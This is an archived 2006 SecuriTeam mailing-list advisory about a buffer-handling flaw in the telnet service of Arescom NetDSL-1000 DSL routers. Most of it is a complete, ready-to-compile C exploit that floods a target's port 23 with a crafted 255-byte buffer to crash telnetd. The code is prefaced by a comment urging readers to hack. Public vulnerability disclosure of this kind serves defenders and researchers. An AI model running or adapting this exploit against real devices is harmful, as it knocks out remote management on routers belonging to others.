Network Security: Detailed info on [EXPL] Arescom NetDSL-1000 TelnetD DoS (Exploit)

Subject:	[EXPL] Arescom NetDSL-1000 TelnetD DoS (Exploit)
Date:	7 Feb 2006 17:28:56 +0200

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Arescom NetDSL-1000 TelnetD DoS (Exploit)
------------------------------------------------------------------------


SUMMARY

"The  <http://www.arescom.com/> Arescom NetDSL-1000 series of DSL routers 
is in common use by a number of DSL providers."

Arescom NetDSL-1000 leaves the telnet port open. Improper buffer handling 
allows attackers to DoS the Router and crash the service.

DETAILS

Vulnerable Systems:
 * Arescom NetDSL-1000

Exploit:
/*
    Do you want to hack? les`t go .. free your mind
    Tu veux etre un hacker? allez .. if faut libere ta tete!
    Quieres hackear? dale .. libera tu mente
    
    Vulnerabilidad en modem Arescom NetDSL-1000
    por un buffer overflow debido < [255] en la pila stack.
    
    DoS atack por Fabian Ramirez S. <framirez at akori.fr>
                                                www.framirez.com


          If you flood the telnet configuration a couple dozen times with 
long
        strings, eventually the telnetd service flat out dies. Routing 
functions
        of the NetDSL continue to work fine as before. It is unknown 
whether only
        the telnetd service is affected, other means of remote 
configuration may
        have become unavailable as well.

        Remember:   KING
    
    Solo para fines educativos! (CREEEEEEO ZEEEEEEEEEEE)
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 23
#define MAXDATASIZE 100

char shellcode[]= "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
                  "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1";

int main(int argc, char *argv[])
{
   int fd, numbytes,i;
   char buf[MAXDATASIZE];
   struct hostent *he;
   struct sockaddr_in server;

   printf("Exploit Arescom NetDSL-1000 executing\n");
   printf ("                      by framirez\n");
   
   if (argc !=2) {
      printf("Uso: %s <Direcci n IP>\n",argv[0]);
      exit(-1);
   }


    
   if ((he=gethostbyname(argv[1]))==NULL){
      printf("gethostbyname() error\n");
      exit(-1);
   }

   if ((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){
      printf("socket() error\n");
      exit(-1);
   }

   server.sin_family = AF_INET;
   server.sin_port = htons(PORT);
   server.sin_addr = *((struct in_addr *)he->h_addr);

   if(connect(fd, (struct sockaddr *)&server,
      sizeof(struct sockaddr))==-1){
      printf("ERROR conectando al host\n");
      exit(-1);
   }
      
    for (i=0;i<3;i++)
    {
    send(fd,shellcode,255,0);
    }
    
    printf ("Exploit enviado con EXITO al destinatario\n");
    printf ("                              by framirez\n");

   close(fd);

  return 1;
}

/* EoF */


ADDITIONAL INFORMATION

The information has been provided by  <mailto:framirez@akori.fr> Fabian 
Ramirez S.
The advisory can be found at:  
<http://www.securiteam.com/securitynews/5SP0G2A6AM.html> 
http://www.securiteam.com/securitynews/5SP0G2A6AM.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.

<Prev in Thread]	Current Thread	[Next in Thread>
[EXPL] Arescom NetDSL-1000 TelnetD DoS (Exploit), SecuriTeam <=

Previous by Date:	[TOOL] The Offline NT Password Editor, SecuriTeam
Next by Date:	[TOOL] Reason - Nessus Client, SecuriTeam
Previous by Thread:	[TOOL] The Offline NT Password Editor, SecuriTeam
Next by Thread:	[TOOL] Reason - Nessus Client, SecuriTeam
Indexes:	[Date] [Thread] [Top] [All Lists]